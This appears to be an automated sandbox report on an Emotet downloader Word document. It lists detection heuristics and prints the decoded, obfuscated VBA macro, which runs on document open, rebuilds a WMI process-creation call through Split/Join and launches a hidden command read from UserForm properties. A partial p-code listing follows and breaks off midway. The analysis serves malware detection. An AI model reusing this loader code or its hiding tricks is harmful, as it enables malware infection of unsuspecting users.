MALICIOUS
230
Risk Score
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-7577855-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7577855-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGERVBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.Matched line in script
Edtiynlp = CVar(Join(Split(Zndfbanud, "}&*$**(){"), NoLineBreakAfter)) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Jtfezogesgj = CreateObject(Gckkmlvwxbvq) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_open() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 33092 bytes |
SHA-256: e0267fd20d36387e61e2bd4cb59d18addd724f7124ca47d6380cd29118b596c4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Iyzgbgmtxzfk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
HgKlHeRxyx = Trim$(" fpCzbOrrBK ")
eYCgTHbUrq = Trim$(" kSTokTqrAE ")
AepzxwaawS = Trim$(" vcNMCvZAtj ")
hRoTwUiEiW = Trim$(" GeEhhzvoze ")
wqPQZAJhhx = Trim$(" wjOhwARgBL ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Byfntkyrxc.Rralnovcbgoa
End Sub
Attribute VB_Name = "Tghubfzeuukll"
Attribute VB_Base = "0{BA3F1FDC-DCFA-4EB5-8B04-02B6C1E13061}{B193BA01-CBF8-48ED-B318-40DCFFE6A7C9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Lwlgflhjpjwct"
Attribute VB_Base = "0{208DC996-66E4-46DB-954E-625D52EEF108}{D8E13A64-EED1-4A36-8810-1292FE0253CD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Zfurbukjoxrl()
Debug.Print "NXBUWWD" + DDD + "pOLON"
End Sub
Attribute VB_Name = "Yugaeabpo"
Attribute VB_Base = "0{DB0AC603-BEC0-40EB-A176-2F2E678FDF07}{FC1EE9FD-9AD4-4F41-AC12-4123EB7717C6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Ihpidrhiwgbti()
Debug.Print "NXBUWWD" + DDD + "pOLON"
End Sub
Attribute VB_Name = "Bnxinzkd"
Attribute VB_Base = "0{4A376AAA-065C-4A4F-AB74-EDBC59DC652E}{41E00E66-A228-4AB8-A7E2-12E6618372D9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Qcpbskrlttn()
Debug.Print "NXBUWWD" + DDD + "pOLON"
End Sub
Attribute VB_Name = "Kfkdazwb"
Attribute VB_Base = "0{98560D6F-C557-43BE-AEFD-AC28E0D6B0E9}{B42670B8-9FD8-4345-BCE5-0DE831DC492E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Ayorfvyyeytn()
Debug.Print "NXBUWWD" + DDD + "pOLON"
End Sub
Attribute VB_Name = "Hdwkipoqgmnc"
Attribute VB_Base = "0{48CC0F2B-0410-4B64-945E-A966A7ACA08F}{1B4801F2-3987-4022-916F-9F21E130DCC5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Jdtnrjoceslqu()
Debug.Print "NXBUWWD" + DDD + "pOLON"
End Sub
Attribute VB_Name = "Wiwqsvxdmt"
Attribute VB_Base = "0{864EBA86-54D3-4A1E-9886-5BB6BECD66CC}{8D0143A4-B294-465C-9F2E-C76A6BE9A521}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Kscedscpa()
Debug.Print "NXBUWWD" + DDD + "pOLON"
End Sub
Attribute VB_Name = "Vfdfzdysu"
Attribute VB_Base = "0{276040A7-2AB3-49A5-9B1F-CC455302ED9A}{5DC338A8-D5C3-4D14-8B95-657F4131AD6C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Jeqmjalah()
Debug.Print "NXBUWWD" + DDD + "pOLON"
End Sub
Attribute VB_Name = "Byfntkyrxc"
Function Rralnovcbgoa()
HgKlHeRxyx = Trim$(" fpCzbOrrBK ")
eYCgTHbUrq = Trim$(" kSTokTqrAE ")
AepzxwaawS = Trim$(" vcNMCvZAtj ")
hRoTwUiEiW = Trim$(" GeEhhzvoze ")
wqPQZAJhhx = Trim$(" wjOhwARgBL ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Jveqcqxjuj = "}&*$**(){}&*$**(){w}&*$**(){i}&*$**(){}&*$**(){n}&*$**(){m}&*$**(){g}&*$**(){}&*$**(){mt}&*$**(){}&*$**(){" + ChrW(Tghubfzeuukll.Zoom + 15) + ":}&*$**(){wi}&*$**(){}&*$**(){n3}&*$**(){}&*$**(){}&*$**(){2}&*$**(){}&*$**(){_}&*$**(){}&*$**(){" + Tghubfzeuukll.Snscuxuzloggw + "r}&*$**(){}&*$**(){o}&*$**(){ce}&*$**(){s}&*$**(){}&*$**(){s}&*$**(){"
HgKlHeRxyx = Trim$(" fpCzbOrrBK ")
eYCgTHbUrq = Trim$(" kSTokTqrAE ")
AepzxwaawS = Trim$(" vcNMCvZAtj ")
hRoTwUiEiW = Trim$(" GeEhhzvoze ")
wqPQZAJhhx = Trim$(" wjOhwARgBL ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Gckkmlvwxbvq = Edtiynlp(Jveqcqxjuj)
HgKlHeRxyx = Trim$(" fpCzbOrrBK ")
eYCgTHbUrq = Trim$(" kSTokTqrAE ")
AepzxwaawS = Trim$(" vcNMCvZAtj ")
hRoTwUiEiW = Trim$(" GeEhhzvoze ")
wqPQZAJhhx = Trim$(" wjOhwARgBL ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Set Jtfezogesgj = CreateObject(Gckkmlvwxbvq)
HgKlHeRxyx = Trim$(" fpCzbOrrBK ")
eYCgTHbUrq = Trim$(" kSTokTqrAE ")
AepzxwaawS = Trim$(" vcNMCvZAtj ")
hRoTwUiEiW = Trim$(" GeEhhzvoze ")
wqPQZAJhhx = Trim$(" wjOhwARgBL ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Ydimfihapsui = Tghubfzeuukll.Gxawsqaifi.Tag
HgKlHeRxyx = Trim$(" fpCzbOrrBK ")
eYCgTHbUrq = Trim$(" kSTokTqrAE ")
AepzxwaawS = Trim$(" vcNMCvZAtj ")
hRoTwUiEiW = Trim$(" GeEhhzvoze ")
wqPQZAJhhx = Trim$(" wjOhwARgBL ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Avwocjrgbvfb = Gckkmlvwxbvq + ChrW(Tghubfzeuukll.Zoom + 15) + Tghubfzeuukll.Lajnusjizy.Tag + Ydimfihapsui
HgKlHeRxyx = Trim$(" fpCzbOrrBK ")
eYCgTHbUrq = Trim$(" kSTokTqrAE ")
AepzxwaawS = Trim$(" vcNMCvZAtj ")
hRoTwUiEiW = Trim$(" GeEhhzvoze ")
wqPQZAJhhx = Trim$(" wjOhwARgBL ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Nqnuglkr = Avwocjrgbvfb + Tghubfzeuukll.Snscuxuzloggw
HgKlHeRxyx = Trim$(" fpCzbOrrBK ")
eYCgTHbUrq = Trim$(" kSTokTqrAE ")
AepzxwaawS = Trim$(" vcNMCvZAtj ")
hRoTwUiEiW = Trim$(" GeEhhzvoze ")
wqPQZAJhhx = Trim$(" wjOhwARgBL ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Set Rrxgcainj = Quhgaqiodzfj(Nqnuglkr)
HgKlHeRxyx = Trim$(" fpCzbOrrBK ")
eYCgTHbUrq = Trim$(" kSTokTqrAE ")
AepzxwaawS = Trim$(" vcNMCvZAtj ")
hRoTwUiEiW = Trim$(" GeEhhzvoze ")
wqPQZAJhhx = Trim$(" wjOhwARgBL ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Call Jtfezogesgj. _
Create(khknasas + Qfivltslbg + nbswe, Ewlgnelyjfrh, Rrxgcainj)
HgKlHeRxyx = Trim$(" fpCzbOrrBK ")
eYCgTHbUrq = Trim$(" kSTokTqrAE ")
AepzxwaawS = Trim$(" vcNMCvZAtj ")
hRoTwUiEiW = Trim$(" GeEhhzvoze ")
wqPQZAJhhx = Trim$(" wjOhwARgBL ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
End Function
Function Quhgaqiodzfj(Eivgcphxkfu)
HgKlHeRxyx = Trim$(" fpCzbOrrBK ")
eYCgTHbUrq = Trim$(" kSTokTqrAE ")
AepzxwaawS = Trim$(" vcNMCvZAtj ")
hRoTwUiEiW = Trim$(" GeEhhzvoze ")
wqPQZAJhhx = Trim$(" wjOhwARgBL ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Set Quhgaqiodzfj = CreateObject(Eivgcphxkfu)
HgKlHeRxyx = Trim$(" fpCzbOrrBK ")
eYCgTHbUrq = Trim$(" kSTokTqrAE ")
AepzxwaawS = Trim$(" vcNMCvZAtj ")
hRoTwUiEiW = Trim$(" GeEhhzvoze ")
wqPQZAJhhx = Trim$(" wjOhwARgBL ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Quhgaqiodzfj. _
showwindow = Cyentyqxbctjp + Oxyugnittiwrf
HgKlHeRxyx = Trim$(" fpCzbOrrBK ")
eYCgTHbUrq = Trim$(" kSTokTqrAE ")
AepzxwaawS = Trim$(" vcNMCvZAtj ")
hRoTwUiEiW = Trim$(" GeEhhzvoze ")
wqPQZAJhhx = Trim$(" wjOhwARgBL ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
End Function
Function Edtiynlp(Zndfbanud)
HgKlHeRxyx = Trim$(" fpCzbOrrBK ")
eYCgTHbUrq = Trim$(" kSTokTqrAE ")
AepzxwaawS = Trim$(" vcNMCvZAtj ")
hRoTwUiEiW = Trim$(" GeEhhzvoze ")
wqPQZAJhhx = Trim$(" wjOhwARgBL ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Edtiynlp = CVar(Join(Split(Zndfbanud, "}&*$**(){"), NoLineBreakAfter))
HgKlHeRxyx = Trim$(" fpCzbOrrBK ")
eYCgTHbUrq = Trim$(" kSTokTqrAE ")
AepzxwaawS = Trim$(" vcNMCvZAtj ")
hRoTwUiEiW = Trim$(" GeEhhzvoze ")
wqPQZAJhhx = Trim$(" wjOhwARgBL ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
End Function
Function Qfivltslbg()
HgKlHeRxyx = Trim$(" fpCzbOrrBK ")
eYCgTHbUrq = Trim$(" kSTokTqrAE ")
AepzxwaawS = Trim$(" vcNMCvZAtj ")
hRoTwUiEiW = Trim$(" GeEhhzvoze ")
wqPQZAJhhx = Trim$(" wjOhwARgBL ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
nnannauwe = "}&*$**(){ }&*$**(){-}&*$**(){e}&*$**(){ }&*$**(){"
HgKlHeRxyx = Trim$(" fpCzbOrrBK ")
eYCgTHbUrq = Trim$(" kSTokTqrAE ")
AepzxwaawS = Trim$(" vcNMCvZAtj ")
hRoTwUiEiW = Trim$(" GeEhhzvoze ")
wqPQZAJhhx = Trim$(" wjOhwARgBL ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Ijuvnllmwa = ChrW(Int(wdKeyP))
HgKlHeRxyx = Trim$(" fpCzbOrrBK ")
eYCgTHbUrq = Trim$(" kSTokTqrAE ")
AepzxwaawS = Trim$(" vcNMCvZAtj ")
hRoTwUiEiW = Trim$(" GeEhhzvoze ")
wqPQZAJhhx = Trim$(" wjOhwARgBL ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Kjbabcykixzij = Ijuvnllmwa + Tghubfzeuukll.Zapfigkqjlcsg.ControlTipText + nnannauwe
HgKlHeRxyx = Trim$(" fpCzbOrrBK ")
eYCgTHbUrq = Trim$(" kSTokTqrAE ")
AepzxwaawS = Trim$(" vcNMCvZAtj ")
hRoTwUiEiW = Trim$(" GeEhhzvoze ")
wqPQZAJhhx = Trim$(" wjOhwARgBL ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
dkhiqwhnkew = Tghubfzeuukll.Rfqukbrv.Pages(0).Caption
HgKlHeRxyx = Trim$(" fpCzbOrrBK ")
eYCgTHbUrq = Trim$(" kSTokTqrAE ")
AepzxwaawS = Trim$(" vcNMCvZAtj ")
hRoTwUiEiW = Trim$(" GeEhhzvoze ")
wqPQZAJhhx = Trim$(" wjOhwARgBL ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
Qfivltslbg = Edtiynlp(Kjbabcykixzij + StrReverse(dkhiqwhnkew))
HgKlHeRxyx = Trim$(" fpCzbOrrBK ")
eYCgTHbUrq = Trim$(" kSTokTqrAE ")
AepzxwaawS = Trim$(" vcNMCvZAtj ")
hRoTwUiEiW = Trim$(" GeEhhzvoze ")
wqPQZAJhhx = Trim$(" wjOhwARgBL ")
EZTGslBbfq = "zSzItGhKYQ"
sPkiPWgEFY = 112628
EZTGslBbfq = EZTGslBbfq & CStr(sPkiPWgEFY)
FlAUEmBDUn = EZTGslBbfq
End Function
' Processing file: /opt/analyzer/scan_staging/47c5d4eee8ee4021bef2e7769beb4e06.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Iyzgbgmtxzfk - 1906 bytes
' Line #0:
' FuncDefn (Private Sub Iyzgbgmtxzfk())
' Line #1:
' LitStr 0x0015 " fpCzbOrrBK "
' ArgsLd HgKlHeRxyx$ 0x0001
' St Document_open
' Line #2:
' LitStr 0x0015 " kSTokTqrAE "
' ArgsLd HgKlHeRxyx$ 0x0001
' St Trim
' Line #3:
' LitStr 0x0015 " vcNMCvZAtj "
' ArgsLd HgKlHeRxyx$ 0x0001
' St eYCgTHbUrq
' Line #4:
' LitStr 0x0015 " GeEhhzvoze "
' ArgsLd HgKlHeRxyx$ 0x0001
' St AepzxwaawS
' Line #5:
' LitStr 0x0015 " wjOhwARgBL "
' ArgsLd HgKlHeRxyx$ 0x0001
' St hRoTwUiEiW
' Line #6:
' LitStr 0x000A "zSzItGhKYQ"
' St wqPQZAJhhx
' Line #7:
' LitDI4 0xB7F4 0x0001
' St EZTGslBbfq
' Line #8:
' Ld wqPQZAJhhx
' Ld EZTGslBbfq
' Coerce (Str)
' Concat
' St wqPQZAJhhx
' Line #9:
' Ld wqPQZAJhhx
' St sPkiPWgEFY
' Line #10:
' Ld FlAUEmBDUn
' ArgsMemCall Byfntkyrxc 0x0000
' Line #11:
' EndSub
' Macros/VBA/Tghubfzeuukll - 1170 bytes
' Macros/VBA/Lwlgflhjpjwct - 1402 bytes
' Line #0:
' FuncDefn (Sub Zfurbukjoxrl())
' Line #1:
' Debug
' PrintObj
' LitStr 0x0007 "NXBUWWD"
' Ld DDD
' Add
' LitStr 0x0005 "pOLON"
' Add
' PrintItemNL
' Line #2:
' EndSub
' Macros/VBA/Yugaeabpo - 1398 bytes
' Line #0:
' FuncDefn (Sub Ihpidrhiwgbti())
' Line #1:
' Debug
' PrintObj
' LitStr 0x0007 "NXBUWWD"
' Ld DDD
' Add
' LitStr 0x0005 "pOLON"
' Add
' PrintItemNL
' Line #2:
' EndSub
' Macros/VBA/Bnxinzkd - 1392 bytes
' Line #0:
' FuncDefn (Sub Qcpbskrlttn())
' Line #1:
' Debug
' PrintObj
' LitStr 0x0007 "NXBUWWD"
' Ld DDD
' Add
' LitStr 0x0005 "pOLON"
' Add
' PrintItemNL
' Line #2:
' EndSub
' Macros/VBA/Kfkdazwb - 1393 bytes
' Line #0:
' FuncDefn (Sub Ayorfvyyeytn())
' Line #1:
' Debug
' PrintObj
' LitStr 0x0007 "NXBUWWD"
' Ld DDD
' Add
' LitStr 0x0005 "pOLON"
' Add
' PrintItemNL
' Line #2:
' EndSub
' Macros/VBA/Hdwkipoqgmnc - 1402 bytes
' Line #0:
' FuncDefn (Sub Jdtnrjoceslqu())
' Line #1:
' Debug
' PrintObj
' LitStr 0x0007 "NXBUWWD"
' Ld DDD
' Add
' LitStr 0x0005 "pOLON"
' Add
' PrintItemNL
' Line #2:
' EndSub
' Macros/VBA/Wiwqsvxdmt - 1391 bytes
' Line #0:
' FuncDefn (Sub Kscedscpa())
' Line #1:
' Debug
' PrintObj
' LitStr 0x0007 "NXBUWWD"
' Ld DDD
' Add
' LitStr 0x0005 "pOLON"
' Add
' PrintItemNL
' Line #2:
' EndSub
' Macros/VBA/Vfdfzdysu - 1392 bytes
' Line #0:
' FuncDefn (Sub Jeqmjalah())
' Line #1:
' Debug
' PrintObj
' LitStr 0x0007 "NXBUWWD"
' Ld DDD
' Add
' LitStr 0x0005 "pOLON"
' Add
' PrintItemNL
' Line #2:
' EndSub
' Macros/VBA/Byfntkyrxc - 11903 bytes
' Line #0:
' FuncDefn (Function Byfntkyrxc())
' Line #1:
' LitStr 0x0015 " fpCzbOrrBK "
' ArgsLd HgKlHeRxyx$ 0x0001
' St Document_open
' Line #2:
' LitStr 0x0015 " kSTokTqrAE "
' ArgsLd HgKlHeRxyx$ 0x0001
' St Trim
' Line #3:
' LitStr 0x0015 " vcNMCvZAtj "
' ArgsLd HgKlHeRxyx$ 0x0001
' St eYCgTHbUrq
' Line #4:
' LitStr 0x0015 " GeEhhzvoze "
' ArgsLd HgKlHeRxyx$ 0x0001
' St AepzxwaawS
' Line #5:
' LitStr 0x0015 " wjOhwARgBL "
' ArgsLd HgKlHeRxyx$ 0x0001
' St hRoTwUiEiW
' Line #6:
' LitStr 0x000A "zSzItGhKYQ"
' St wqPQZAJhhx
' Line #7:
' LitDI4 0xB7F4 0x0001
' St EZTGslBbfq
' Line #8:
' Ld wqPQZAJhhx
' Ld EZTGslBbfq
' Coerce (Str)
' Concat
' St wqPQZAJhhx
' Line #9:
' Ld wqPQZAJhhx
' St sPkiPWgEFY
' Line #10:
' LitStr 0x006A "}&*$**(){}&*$**(){w}&*$**(){i}&*$**(){}&*$**(){n}&*$**(){m}&*$**(){g}&*$**(){}&*$**(){mt}&*$**(){}&*$**(){"
' Ld Tghubfzeuukll
' MemLd ChrW
' LitDI2 0x000F
' Add
' ArgsLd Jveqcqxjuj 0x0001
' Add
' LitStr 0x0061 ":}&*$**(){wi}&*$**(){}&*$**(){n3}&*$**(){}&*$**(){}&*$**(){2}&*$**(){}&*$**(){_}&*$**(){}&*$**(){"
' Add
' Ld Tghubfzeuukll
' MemLd Zoom
' Add
' LitStr 0x0045 "r}&*$**(){}&*$**(){o}&*$**(){ce}&*$**(){s}&*$**(){}&*$**(){s}&*$**(){"
' Add
' St Rralnovcbgoa
' Line #11:
' LitStr 0x0015 " fpCzbOrrBK "
' ArgsLd HgKlHeRxyx$ 0x0001
' St Document_open
' Line #12:
' LitStr 0x0015 " kSTokTqrAE "
' ArgsLd HgKlHeRxyx$ 0x0001
' St Trim
' Line #13:
' LitStr 0x0015 " vcNMCvZAtj "
' ArgsLd HgKlHeRxyx$ 0x0001
' St eYCgTHbUrq
' Line #14:
' LitStr 0x0015 " GeEhhzvoze "
' ArgsLd HgKlHeRxyx$ 0x0001
' St AepzxwaawS
' Line #15:
' LitStr 0x0015 " wjOhwARgBL "
' ArgsLd HgKlHeRxyx$ 0x0001
' St hRoTwUiEiW
' Line #16:
' LitStr 0x000A "zSzItGhKYQ"
' St wqPQZAJhhx
' Line #17:
' LitDI4 0xB7F4 0x0001
' St EZTGslBbfq
' Line #18:
' Ld wqPQZAJhhx
' Ld EZTGslBbfq
' Coerce (Str)
' Concat
' St wqPQZAJhhx
' Line #19:
' Ld wqPQZAJhhx
' St sPkiPWgEFY
' Line #20:
' Ld Rralnovcbgoa
' ArgsLd Gckkmlvwxbvq 0x0001
' St Snscuxuzloggw
' Line #21:
' LitStr 0x0015 " fpCzbOrrBK "
' ArgsLd HgKlHeRxyx$ 0x0001
' St Document_open
' Line #22:
' LitStr 0x0015 " kSTokTqrAE "
' ArgsLd HgKlHeRxyx$ 0x0001
' St Trim
' Line #23:
' LitStr 0x0015 " vcNMCvZAtj "
' ArgsLd HgKlHeRxyx$ 0x0001
' St eYCgTHbUrq
' Line #24:
' LitStr 0x0015 " GeEhhzvoze "
' ArgsLd HgKlHeRxyx$ 0x0001
' St AepzxwaawS
' Line #25:
' LitStr 0x0015 " wjOhwARgBL "
' ArgsLd HgKlHeRxyx$ 0x0001
' St hRoTwUiEiW
' Line #26:
' LitStr 0x000A "zSzItGhKYQ"
' St wqPQZAJhhx
' Line #27:
' LitDI4 0xB7F4 0x0001
' St EZTGslBbfq
' Line #28:
' Ld wqPQZAJhhx
' Ld EZTGslBbfq
' Coerce (Str)
' Concat
' St wqPQZAJhhx
' Line #29:
' Ld wqPQZAJhhx
' St sPkiPWgEFY
' Line #30:
' SetStmt
' Ld Snscuxuzloggw
' ArgsLd Jtfezogesgj 0x0001
' Set Edtiynlp
' Line #31:
' LitStr 0x0015 " fpCzbOrrBK "
' ArgsLd HgKlHeRxyx$ 0x0001
' St Document_open
' Line #32:
' LitStr 0x0015 " kSTokTqrAE "
' ArgsLd HgKlHeRxyx$ 0x0001
' St Trim
' Line #33:
' LitStr 0x0015 " vcNMCvZAtj "
' ArgsLd HgKlHeRxyx$ 0x0001
' St eYCgTHbUrq
' Line #34:
' LitStr 0x0015 " GeEhhzvoze "
' ArgsLd HgKlHeRxyx$ 0x0001
' St AepzxwaawS
' Line #35:
' LitStr 0x0015 " wjOhwARgBL "
' ArgsLd HgKlHeRxyx$ 0x0001
' St hRoTwUiEiW
' Line #36:
' LitStr 0x000A "zSzItGhKYQ"
' St wqPQZAJhhx
' Line #37:
' LitDI4 0xB7F4 0x0001
' St EZTGslBbfq
' Line #38:
' Ld wqPQZAJhhx
' Ld EZTGslBbfq
' Coerce (Str)
' Concat
' St wqPQZAJhhx
' Line #39:
' Ld wqPQZAJhhx
' St sPkiPWgEFY
' Line #40:
' Ld Tghubfzeuukll
' MemLd Ydimfihapsui
' MemLd Tag
' St CreateObject
' Line #41:
' LitStr 0x0015 " fpCzbOrrBK "
' ArgsLd HgKlHeRxyx$ 0x0001
' St Document_open
' Line #42:
' LitStr 0x0015 " kSTokTqrAE "
' ArgsLd HgKlHeRxyx$ 0x0001
' St Trim
' Line #43:
' LitStr 0x0015 " vcNMCvZAtj "
' ArgsLd HgKlHeRxyx$ 0x0001
' St eYCgTHbUrq
' Line #44:
' LitStr 0x0015 " GeEhhzvoze "
' ArgsLd HgKlHeRxyx$ 0x0001
' St AepzxwaawS
' Line #45:
' LitStr 0x0015 " wjOhwARgBL "
' ArgsLd HgKlHeRxyx$ 0x0001
' St hRoTwUiEiW
' Line #46:
' LitStr 0x000A "zSzItGhKYQ"
' St wqPQZAJhhx
' Line #47:
' LitDI4 0xB7F4 0x0001
' St EZTGslBbfq
' Line #48:
' Ld wqPQZAJhhx
' Ld EZTGslBbfq
' Coerce (Str)
' Concat
' St wqPQZAJhhx
' Line #49:
' Ld wqPQZAJhhx
' St sPkiPWgEFY
' Line #50:
' Ld Snscuxuzloggw
' Ld Tghubfzeuukll
' MemLd ChrW
' LitDI2 0x000F
' Add
' ArgsLd Jveqcqxjuj 0x0001
' Add
' Ld Tghubfzeuukll
' MemLd Avwocjrgbvfb
' MemLd Tag
' Add
' Ld CreateObject
' Add
' St Gxawsqaifi
' Line #51:
' LitStr 0x0015 " fpCzbOrrBK "
' ArgsLd HgKlHeRxyx$ 0x0001
' St Document_open
' Line #52:
' LitStr 0x0015 " kSTokTqrAE "
' ArgsLd HgKlHeRxyx$ 0x0001
' St Trim
' Line #53:
' LitStr 0x0015 " vcNMCvZAtj "
' ArgsLd HgKlHeRxyx$ 0x0001
' St eYCgTHbUrq
' Line #54:
' LitStr 0x0015 " GeEhhzvoze "
' ArgsLd HgKlHeRxyx$ 0x0001
' St AepzxwaawS
' Line #55:
' LitStr 0x0015 " wjOhwARgBL "
' ArgsLd HgKlHeRxyx$ 0x0001
' St hRoTwUiEiW
' Line #56:
' LitStr 0x000A "zSzItGhKYQ"
' St wqPQZAJhhx
' Line #57:
' LitDI4 0xB7F4 0x0001
' St EZTGslBbfq
' Line #58:
' Ld wqPQZAJhhx
' Ld EZTGslBbfq
' Coerce (Str)
' Concat
' St wqPQZAJhhx
' Line #59:
' Ld wqPQZAJhhx
' St sPkiPWgEFY
' Line #60:
' Ld Gxawsqaifi
' Ld Tghubfzeuukll
' MemLd Zoom
' Add
' St Lajnusjizy
' Line #61:
' LitStr 0x0015 " fpCzbOrrBK "
' ArgsLd HgKlHeRxyx$ 0x0001
' St Document_open
' Line #62:
' LitStr 0x0015 " kSTokTqrAE "
' ArgsLd HgKlHeRxyx$ 0x0001
